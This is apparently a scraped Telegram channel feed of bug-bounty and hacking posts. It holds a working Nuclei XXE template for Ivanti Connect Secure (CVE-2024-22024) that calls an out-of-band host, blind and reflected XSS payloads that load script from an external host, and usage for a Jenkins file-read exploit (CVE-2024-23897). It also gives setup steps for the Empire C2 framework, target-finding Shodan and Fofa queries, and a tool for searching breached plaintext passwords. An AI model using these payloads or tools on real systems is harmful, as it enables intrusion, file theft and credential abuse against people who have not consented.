Nuclei PoC for Ivanti XXE (CVE-2024-22024)
#Nuclei #Templates #PoC #XXE
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
id: CVE-2024-22024
info:
name: Ivanti Connect Secure - XXE
author: watchTowr
severity: high
denoscription: |
Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
remediation: |
Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
reference:
- https://labs.watchtowr.com/are-we-now-part-of-ivanti/
- https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
metadata:
max-request: 1
vendor: ivanti
product: "connect_secure"
shodan-query: "html:\"welcome.cgi?p=logo\""
tags: cve,cve2024,kev,xxe,ivanti
variables:
payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
"http://{{interactsh-url}}/x"> %watchTowr;]><r></r>'
http:
- raw:
- |
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
SAMLRequest={{base64(payload)}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: body
words:
- '/dana-na/'
- 'WriteCSS'
condition: and
# digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950
#Nuclei #Templates #PoC #XXE
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2🤔2❤1❤🔥1👍1
Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. The Empire server is written in Python 3 and is modular to allow operator flexibility. Empire comes built-in with a client that can be used remotely to access the server. There is also a GUI available for remotely accessing the Empire server, Starkiller.
cd Empire
./setup/checkout-latest-tag.sh
./setup/install.sh
#Hacktoberfest #C2 #Redteam #Infrastructure
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2❤1👍1🔥1
Adding 2 new blind XSS payloads to the XSS scanner payload vault 😎
AND
#XSS #Bugbounty #Tip
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
'"><Svg Src=//{CANARY_TOKEN}/s OnLoad=import(this.getAttribute('src')+0)>AND
'"><Img Src=//{CANARY_TOKEN}/x Onload=import(src+0)>#XSS #Bugbounty #Tip
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5❤2🔥1
Linux for Hackers: LINUX commands you need to know
⬇️ Download
#linux #hacker #video
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
#linux #hacker #video
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2❤1🔥1
311138#Burpsuite #Pro #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥2❤1👍1🤣1
This h1finder.sh is noscript which collect all program names and then collect all assets and save it into wild and non-wild domains
You can get your API key from
cd h1-asset-fetcher
chmod +x h1finder
mv h1finder /usr/bin/
h1finder -t <token> -u <username> -b <true/false>
BugCod3#BugBounty #Tips #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3❤1👍1🔥1
Query Fofa:
body="/wp-content/themes/bricks/"#BugBounty #Tips #Nuclei #Template
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3❤2👍1🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
Example query:
https://shodan.io/search/facet?query=hostname%3A*.apnic.net&facet=ipDownload source page
Regex:
grep '<strong>' shodan.html | cut -d '>' -f 4 | cut -d '<' -f 1#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3❤1🔥1
for searching leaked keys and secrets is a must-have. Here is how I was able to find a P1 recently using BurpSuite, The leaked secrets allowed me to see some employee related juicy info.
BugCod3#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4❤2🔥2
Exploitation and scanning tool specifically designed for Jenkins versions
<= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.
python CVE-2024-23897.py -t <target> -p <port> -f <file>
or
python CVE-2024-23897.py -i <input_file> -f <file>
-t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block.-i or --input-file: Path to input file containing hosts in the format of http://1.2.3.4:8080/ (one per line).-o or --output-file: Export results to file (optional).-p or --port: Specify the port number. Default is 8080 (optional).-f or --file: Specify the file to read on the target system.BugCod3#CVE #PoC #Scanner
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4❤3🔥1
10000 h1 disclosed reports
💬
On
😸 Github
⬇️ Download
🔒
#Python #H1 #Report
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
On
31st Dec 2023, I made it my goal to read 10,000 H1 Reports in 2024 Q1 (i.e. first 3 months) to really understand deep down what kind of bugs are being reported, accepted, or rejected and how exactly I should approach my journey in #bugbounty. Also, I thought, there was no better resource than actual disclosed bug reports. Later I decided to cap my goal at *5000* because I think I nailed the common pattern and already accomplished what I wanted to get out of it.BugCod3#Python #H1 #Report
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3❤2🔥1💯1
This Burp extension allows you to spin up a DigitalOcean droplet based on an OpenVPN configuration file. The droplet also functions as a SOCKS5 proxy to allow routing all Burp traffic through the VPN tunnel. The Burp proxy settings are automatically configured to route traffic through the SOCKS5 and OpenVPN droplet.
build/libs/digitalocean-droplet-openvpn-all.jar or build from source yourself;ifconfig.co to easily verify if the VPN is working correctlyBugCod3#Burp #Extension #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3⚡1👍1🔥1💯1
𝗫𝗦𝗦 𝗶𝗻 𝘁𝗵𝗲 .𝗰𝘀𝘀 𝗨𝗥𝗟 𝗽𝗮𝘁𝗵
𝗢𝗿𝗶𝗴𝗶𝗻𝗮𝗹 𝗨𝗥𝗟:
𝗫𝗦𝗦 𝗙𝗼𝘂𝗻𝗱 𝗶𝗻:
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
𝗢𝗿𝗶𝗴𝗶𝗻𝗮𝗹 𝗨𝗥𝗟:
"target/lib/css/animated.min.css"𝗫𝗦𝗦 𝗙𝗼𝘂𝗻𝗱 𝗶𝗻:
"/lib/css/animated.min'"/><noscript%20>alert(document.domain)<%2fnoscript>.css"#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3👍3🔥3⚡1💯1
This is very cool. Get cheatsheets in your terminal with a curl command!
⌨️ Try this:
#Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
curl https://cht.sh/sqlmap#Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3👍3⚡1🔥1💯1
LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.
In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.
Requirements:
pip install -r requirements.txtLeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]BugCod3#Python #Search #Parse #Password
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤2⚡1👍1💯1